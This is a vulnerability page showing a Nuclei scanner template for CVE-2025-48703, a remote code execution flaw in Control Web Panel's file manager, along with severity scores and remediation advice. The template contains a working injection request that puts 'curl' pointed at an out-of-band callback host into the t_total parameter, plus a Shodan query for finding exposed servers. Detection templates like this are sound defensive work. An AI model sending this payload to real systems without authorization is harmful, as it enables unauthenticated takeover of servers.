CWP (Control Web Panel) < 0.9.8.1205 - Remote Code Execution
CVE-2025-48703
Verified
Description
CWP (Control Web Panel) < 0.9.8.1205 contains a remote code execution caused by shell metacharacters in the t_total parameter in filemanager changePerm request, letting unauthenticated attackers execute code remotely, exploit requires knowledge of a valid non-root username.
Severity
Critical
CVSS Score
9
Exploit Probability
58%
Published Date
October 23, 2025
Template Author
theamanrawat
CVE-2025-48703.yaml
id: CVE-2025-48703
info:
name: CWP (Control Web Panel) < 0.9.8.1205 - Remote Code Execution
author: theamanrawat
severity: critical
description: |
CWP (Control Web Panel) < 0.9.8.1205 contains a remote code execution caused by shell metacharacters in the t_total parameter in filemanager changePerm request, letting unauthenticated attackers execute code remotely, exploit requires knowledge of a valid non-root username.
impact: |
Unauthenticated attackers can execute arbitrary code remotely, potentially leading to full system compromise.
remediation: |
Update to version 0.9.8.1205 or later.
reference:
- https://fenrisk.com/rce-centos-webpanel
- https://nvd.nist.gov/vuln/detail/CVE-2025-48703
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.0
cve-id: CVE-2025-48703
epss-score: 0.57823
epss-percentile: 0.9806
cwe-id: CWE-78
metadata:
verified: false
shodan-query: 'Server: cwpsrv'
tags: cve,cve2025,cwp,cwpsrv,rce,intrusive,file-upload,oast,oob,vkev,kev
flow: http(1) && http(2)
http:
- raw:
- |
GET /login/index.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains_all(body, 'Control WebPanel', 'cwp')"
condition: and
internal: true
- raw:
- |
POST /{{username}}/index.php?module=filemanager&acc=changePerm HTTP/1.1
Host: {{hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrTrcHpS9ovyhBLtb
------WebKitFormBoundaryrTrcHpS9ovyhBLtb
Content-Disposition: form-data; name="fileName"
.bashrc
------WebKitFormBoundaryrTrcHpS9ovyhBLtb
Content-Disposition: form-data; name="currentPath"
/home/{{username}}
------WebKitFormBoundaryrTrcHpS9ovyhBLtb
Content-Disposition: form-data; name="recursive"
------WebKitFormBoundaryrTrcHpS9ovyhBLtb
Content-Disposition: form-data; name="t_total"
curl {{interactsh-url}}
------WebKitFormBoundaryrTrcHpS9ovyhBLtb
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: word
part: interactsh_request
words:
- "User-Agent: curl"
# digest: 4a0a00473045022011761c37564b7b878ee869b80b45036aaa96b466b4c94c8bf641c8093b91e8cf0221008307e752c043cfeedb660c3ceba868446668263228953d6ab19e5d268b28a461:922c64590222798bb761d5b6d8e729509.0Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
CVE ID:
cve-2025-48703
CWE ID:
cwe-78
Remediation Steps
Update to version 0.9.8.1205 or later.